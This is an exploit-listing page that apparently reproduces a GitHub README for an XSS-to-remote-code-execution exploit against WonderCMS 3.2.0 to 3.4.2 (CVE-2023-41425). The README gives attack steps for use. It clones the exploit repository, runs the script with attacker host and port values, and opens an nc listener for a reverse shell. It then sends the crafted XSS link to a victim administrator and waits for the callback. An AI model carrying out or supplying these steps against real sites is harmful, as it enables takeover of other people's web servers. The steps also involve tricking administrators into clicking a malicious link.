Share
## https://sploitus.com/exploit?id=ED6E7C6C-EDFB-5863-B5A7-877C5FF3FCB8
# CVE-2023-41425-wonderCMS_RCE
Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component. *For educational purposes only*

Requires knowledge of loginURL, admin access or the ability to get the admin to click the XSS link.
1. Clone the repo
```bash
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
```
2. Run it
```bash
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
```
3. Set up a local listener
```bash
nc -lnvp 9001
```
4. Send the printed xss URL to the victim or if you have admin access click it
5. Wait for a callback

![image](https://github.com/user-attachments/assets/9d5dea86-576e-46cb-95fc-b0e23df59adc)


# Credit

prodigiousMind for discovering and reporting the vulnerability
https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413